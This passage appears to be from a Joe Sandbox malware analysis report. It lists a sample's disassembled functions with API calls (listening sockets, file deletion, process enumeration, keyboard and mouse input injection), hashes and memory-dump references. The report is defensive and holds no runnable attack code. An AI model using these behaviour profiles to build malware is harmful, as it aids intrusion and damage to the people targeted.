                                              • Instruction ID: 78915c3da431b9268667ca5fc60f145fb4ca2b775c3684e87e1272bf05ded46f
                                              • Opcode Fuzzy Hash: 47b0c40420166abd9a0ff79a503794c679e83f3eac62ee7a1c3b0568b2887a52
                                              • Instruction Fuzzy Hash: E0012672611211BFEB1433B59C9AFBF735CD714740F280923F802F62D2D5A19C8489B0
                                              Function 00DF1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00DF1276
                                              • WSAGetLastError.WS2_32 ref: 00DF1283
                                              • bind.WS2_32(00000000,?,00000010), ref: 00DF12BA
                                              • WSAGetLastError.WS2_32 ref: 00DF12C5
                                              • closesocket.WS2_32(00000000), ref: 00DF12F4
                                              • listen.WS2_32(00000000,00000005), ref: 00DF1303
                                              • WSAGetLastError.WS2_32 ref: 00DF130D
                                              • closesocket.WS2_32(00000000), ref: 00DF133C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                              • String ID:
                                              • API String ID: 540024437-0
                                              • Opcode ID: 443913ddb9d944094aaaa70785934bf873d3182cbcde14efb0402bc2c319024f
                                              • Instruction ID: dd257c6fc231feef2c7d69ee4f2ed5ed892f38a561bb8c489fb7035b40f98e85
                                              • Opcode Fuzzy Hash: 443913ddb9d944094aaaa70785934bf873d3182cbcde14efb0402bc2c319024f
                                              • Instruction Fuzzy Hash: 3941AE35A00144DFD714DF64C489B2ABBE5EF86318F29C188E95A9F292C771ED85CBB0
                                              Function 00DDD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DDD420
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD470
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD481
                                              • FindClose.KERNEL32(00000000), ref: 00DDD498
                                              • FindClose.KERNEL32(00000000), ref: 00DDD4A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: f25cf71f04fa89985bbe8317a103b84682e8f2796c04904499dc617f1212caf2
                                              • Instruction ID: 06c243f30ca9ab9932befa88c189a90a88dee0411b7790178e4a943b8ae6ca1a
                                              • Opcode Fuzzy Hash: f25cf71f04fa89985bbe8317a103b84682e8f2796c04904499dc617f1212caf2
                                              • Instruction Fuzzy Hash: 713170310083459FC714EF64D8528AFB7A8EE95304F548A1EF4D5522A1EB31EA09CB73
                                              Function 00DAE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: 86631491d3ce86aa30e9c4ed53517f3466a88631219dfc106c3d5b29541f4740
                                              • Instruction ID: 71e80d074427870e7bbcbfb5ea9def6ec1caed80cadc7046ec7fb52ccef3e7c5
                                              • Opcode Fuzzy Hash: 86631491d3ce86aa30e9c4ed53517f3466a88631219dfc106c3d5b29541f4740
                                              • Instruction Fuzzy Hash: 46C22A71E046288FDB25CF68DD407EAB7B5EB4A305F1845EAD44DE7240E778AE818F60
                                              Function 00DE648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DE64DC
                                              • CoInitialize.OLE32(00000000), ref: 00DE6639
                                              • CoCreateInstance.COMBASE(00E0FCF8,00000000,00000001,00E0FB68,?), ref: 00DE6650
                                              • CoUninitialize.COMBASE ref: 00DE68D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 886957087-24824748
                                              • Opcode ID: 8955cde039f35d13f3bc6d5bb84ab49277e888dca673ca6d0f6f408f2fc76131
                                              • Instruction ID: 7eef3dac980da1f2715c0de64a80353a0b90f7bc75321a3cf6f3bd3e67feec20
                                              • Opcode Fuzzy Hash: 8955cde039f35d13f3bc6d5bb84ab49277e888dca673ca6d0f6f408f2fc76131
                                              • Instruction Fuzzy Hash: 7CD13871608241AFC314EF24C891D6BB7E8FF94344F14896DF5998B2A1EB30E945CBB2
                                              Function 00DF22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00DF22E8
                                                • Part of subcall function 00DEE4EC: GetWindowRect.USER32(?,?), ref: 00DEE504
                                              • GetDesktopWindow.USER32 ref: 00DF2312
                                              • GetWindowRect.USER32(00000000), ref: 00DF2319
                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DF2355
                                              • GetCursorPos.USER32(?), ref: 00DF2381
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DF23DF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                              • String ID:
                                              • API String ID: 2387181109-0
                                              • Opcode ID: 734572b83635766a3fcea9121b674b86cffd060d4f06540d68229d6f11256c01
                                              • Instruction ID: bfbfe41e3295681e7e1f2ddc060ad4b79247722ce244bd0c7b14b2be60fba547
                                              • Opcode Fuzzy Hash: 734572b83635766a3fcea9121b674b86cffd060d4f06540d68229d6f11256c01
                                              • Instruction Fuzzy Hash: 1F31EFB2105319AFC720DF15D844E6BBBE9FF84314F104A1EF984A7181DB35E948CBA2
                                              Function 00DE9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DE9B78
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE9C8B
                                                • Part of subcall function 00DE3874: GetInputState.USER32 ref: 00DE38CB
                                                • Part of subcall function 00DE3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3966
                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE9BA8
                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE9C75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                              • String ID: *.*
                                              • API String ID: 1972594611-438819550
                                              • Opcode ID: 8b86ea278892b2f035779ad35e6375e5af1f2637d0fa2d3b20031bcab1efb1e7
                                              • Instruction ID: 0a4aa688f63ac67226b75a8ee8d72c3281d351122ce2083a954fec0dfdcf4ca4
                                              • Opcode Fuzzy Hash: 8b86ea278892b2f035779ad35e6375e5af1f2637d0fa2d3b20031bcab1efb1e7
                                              • Instruction Fuzzy Hash: EF41837190124AAFCF14FF65C895AEEBBB4EF05310F248156E405A2191EB319E84CF70
                                              Function 00D8997D Relevance: 7.9, APIs: 5, Instructions: 375nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00D89A4E
                                              • GetSysColor.USER32(0000000F), ref: 00D89B23
                                              • SetBkColor.GDI32(?,00000000), ref: 00D89B36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Color$DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 1958858920-0
                                              • Opcode ID: 0c7587da0b3f6b9193a8fd8bd79bcb163ce008142bac356e53fe3716bac515b3
                                              • Instruction ID: 84d7302c59ebeaa06452705b8496d2c685357980ec8b18526d0ce58f3c1a221b
                                              • Opcode Fuzzy Hash: 0c7587da0b3f6b9193a8fd8bd79bcb163ce008142bac356e53fe3716bac515b3
                                              • Instruction Fuzzy Hash: D2A1F870208405AEE72CBB2D8CA9F7B669DEB86350B1D020DF5C2E79D2CA25DD41CB71
                                              Function 00DF1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DF304E: inet_addr.WS2_32(?), ref: 00DF307A
                                                • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 00DF185D
                                              • WSAGetLastError.WS2_32 ref: 00DF1884
                                              • bind.WS2_32(00000000,?,00000010), ref: 00DF18DB
                                              • WSAGetLastError.WS2_32 ref: 00DF18E6
                                              • closesocket.WS2_32(00000000), ref: 00DF1915
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 1601658205-0
                                              • Opcode ID: 0d2b52762cea67fb6421d047ab926b3bc1ab02df48f3e14ecd605aa43a0c1e19
                                              • Instruction ID: 170a5b208432a648b1c9b7f292ba504b5375a78ef17af45844f37789f96fdb89
                                              • Opcode Fuzzy Hash: 0d2b52762cea67fb6421d047ab926b3bc1ab02df48f3e14ecd605aa43a0c1e19
                                              • Instruction Fuzzy Hash: 1E51A175A00200AFD710AF24C886F2A77A5EB48718F18C55CFA196F283D671AD418BB1
                                              Function 00D78060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                              • API String ID: 0-1546025612
                                              • Opcode ID: dc944d964f0cafc0d33563402160dd47044ff44b0ed56ff3e698ec07755a125c
                                              • Instruction ID: faed2f13bba237c633869d042bd5bc6ae536b276c010fd3fe6cfe9a538dc381d
                                              • Opcode Fuzzy Hash: dc944d964f0cafc0d33563402160dd47044ff44b0ed56ff3e698ec07755a125c
                                              • Instruction Fuzzy Hash: 2DA28070E4061ACBDF24CF58C8447EDB7B1BF54314F2881AAE85AA7285EB74DD81DB60
                                              Function 00DD8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD82AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($tb$|
                                              • API String ID: 1659193697-1968160224
                                              • Opcode ID: 7ae7266468b5f37269332af75aef6dd2d9c349e9ad045c194eeca45667d69f49
                                              • Instruction ID: 9012a48174f0a53876776ba37f0617141342b91069b55c76c3e4c8faa5a8ed19
                                              • Opcode Fuzzy Hash: 7ae7266468b5f37269332af75aef6dd2d9c349e9ad045c194eeca45667d69f49
                                              • Instruction Fuzzy Hash: E9323574A007059FCB29CF59C481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941DB60
                                              Function 00DFA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DFA6AC
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DFA6BA
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DFA79C
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFA7AB
                                                • Part of subcall function 00D8CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DB3303,?), ref: 00D8CE8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                              • String ID:
                                              • API String ID: 1991900642-0
                                              • Opcode ID: 99f17ce5f74ffbf0296ce1e00d64dba59893816c3c81f01e1569396d8bc0e81d
                                              • Instruction ID: e7dcc0e1f17a49fb3de6e07faf0c5193c4efd68b84f7aea7b557d404209d5043
                                              • Opcode Fuzzy Hash: 99f17ce5f74ffbf0296ce1e00d64dba59893816c3c81f01e1569396d8bc0e81d
                                              • Instruction Fuzzy Hash: 32512AB15083109FD710EF24C886A6BBBE8FF89754F04891DF589A7252EB70D904CBB2
                                              Function 00DDAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DDAAAC
                                              • SetKeyboardState.USER32(00000080), ref: 00DDAAC8
                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DDAB36
                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DDAB88
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                              • Instruction ID: c29c33649785bb8fbfa49ef62733e318fced9dbe2be6949e9eea67e12b96927c
                                              • Opcode Fuzzy Hash: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                              • Instruction Fuzzy Hash: 7F311630A40218AEFB358B6D8C05BFA7BA6EB45310F18831BF191563E0D375C986C772
                                              Function 00DABB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00DABB7F
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • GetTimeZoneInformation.KERNEL32 ref: 00DABB91
                                              • WideCharToMultiByte.KERNEL32(00000000,?,00E4121C,000000FF,?,0000003F,?,?), ref: 00DABC09
                                              • WideCharToMultiByte.KERNEL32(00000000,?,00E41270,000000FF,?,0000003F,?,?,?,00E4121C,000000FF,?,0000003F,?,?), ref: 00DABC36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                              • String ID:
                                              • API String ID: 806657224-0
                                              • Opcode ID: c6eed3e421a1e43b7d2eee23bb48516ef3f3ac12b9b5d900eb707420c46f2afe
                                              • Instruction ID: 0501a838078d3cecfb6fafd414ce37b92e50a19f94575852c689e48f38b47281
                                              • Opcode Fuzzy Hash: c6eed3e421a1e43b7d2eee23bb48516ef3f3ac12b9b5d900eb707420c46f2afe
                                              • Instruction Fuzzy Hash: BA31CE70944205DFCB10DF6ADC80929BBB8FF47320B1842AAE060E72B2D7709D86DB74
                                              Function 00E08FC9 Relevance: 6.1, APIs: 4, Instructions: 78nativewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • GetCursorPos.USER32(?), ref: 00E09001
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DC7711,?,?,?,?,?), ref: 00E09016
                                              • GetCursorPos.USER32(?), ref: 00E0905E
                                              • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DC7711,?,?,?), ref: 00E09094
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
